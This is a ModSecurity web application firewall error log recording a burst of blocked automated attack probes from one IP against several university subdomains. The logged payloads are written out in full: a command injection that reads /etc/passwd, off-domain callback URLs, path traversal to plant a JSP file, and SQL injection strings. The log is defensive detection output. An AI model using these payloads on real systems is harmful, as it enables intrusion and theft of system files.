[Tue Aug 29 11:32:13.317094 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQNwNsAAAAv"]
[Tue Aug 29 11:32:13.317147 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQOv7AAAAAw"]
[Tue Aug 29 11:32:13.335217 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgdb87rr9otxwei.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgdb87rr9otxwei.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQV4UcAAAA3"]
[Tue Aug 29 11:32:13.335717 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgmq4jk6xbh1r1e.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmq4jk6xbh1r1e.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAP8G4kAAAAV"]
[Tue Aug 29 11:32:13.338138 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg41bor4mq66cgn.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg41bor4mq66cgn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQ7NHYAAAAH"]
[Tue Aug 29 11:32:13.353293 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgwun8r454wg13u.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgwun8r454wg13u.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQMr0kAAAAu"]
[Tue Aug 29 11:32:13.360648 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQ7NHcAAAAH"]
[Tue Aug 29 11:32:13.381290 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgi6rrd5nnnmnci.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgi6rrd5nnnmnci.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQOv7MAAAAw"]
[Tue Aug 29 11:32:14.302995 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zsCo-f0AAAP5mQAAAAAM"]
[Tue Aug 29 11:32:14.581751 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10zsCo-f0AAAQnF9EAAAAF"]
[Tue Aug 29 11:32:15.308365 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQMr00AAAAu"]
[Tue Aug 29 11:32:15.309631 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQNwOIAAAAv"]
[Tue Aug 29 11:32:15.327773 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQMr04AAAAu"]
[Tue Aug 29 11:32:15.329148 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQ9H00AAAAK"]
[Tue Aug 29 11:32:15.352319 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAN9sUAAAAAJ"]
[Tue Aug 29 11:32:15.355254 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQOv7kAAAAw"]
[Tue Aug 29 11:32:15.358851 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAANWgY0AAAAG"]
[Tue Aug 29 11:32:15.367639 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQ9H08AAAAK"]
[Tue Aug 29 11:32:15.413715 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQMr1IAAAAu"]
[Tue Aug 29 11:32:15.413758 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQMr1IAAAAu"]
[Tue Aug 29 11:32:15.416547 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "ft.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAP5mQgAAAAM"]
[Tue Aug 29 11:32:15.416585 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAP5mQgAAAAM"]
[Tue Aug 29 11:32:15.423697 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAANWgZAAAAAG"]
[Tue Aug 29 11:32:16.307635 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQ9H1MAAAAK"]
[Tue Aug 29 11:32:16.334200 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "journal.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQMr1QAAAAu"]
[Tue Aug 29 11:32:16.334248 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQMr1QAAAAu"]
[Tue Aug 29 11:32:16.336968 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO100MCo-f0AAAPDoDQAAAAP"]
[Tue Aug 29 11:32:16.338719 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQ83RsAAAAI"]
[Tue Aug 29 11:32:16.341639 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQOv78AAAAw"]
[Tue Aug 29 11:32:16.358764 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "pusatbahasa.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQ83RwAAAAI"]
[Tue Aug 29 11:32:16.358817 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQ83RwAAAAI"]
[Tue Aug 29 11:32:16.367584 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "informatika.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQnF9YAAAAF"]
[Tue Aug 29 11:32:16.367631 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQnF9YAAAAF"]
[Tue Aug 29 11:32:16.379813 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQOv8EAAAAw"]
[Tue Aug 29 11:32:16.442313 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQnF9kAAAAF"]
[Tue Aug 29 11:32:16.463568 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO100MCo-f0AAAQnF9oAAAAF"]
[Tue Aug 29 11:32:17.378998 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAPiBqcAAAAB"]
[Tue Aug 29 11:32:17.399201 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAP5mQ0AAAAM"]
[Tue Aug 29 11:32:17.420013 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAPiBqkAAAAB"]
[Tue Aug 29 11:32:17.425092 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "www.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100cCo-f0AAAQOv8QAAAAw"]
[Tue Aug 29 11:32:17.425138 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100cCo-f0AAAQOv8QAAAAw"]
[Tue Aug 29 11:32:17.449686 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAANWgZcAAAAG"]
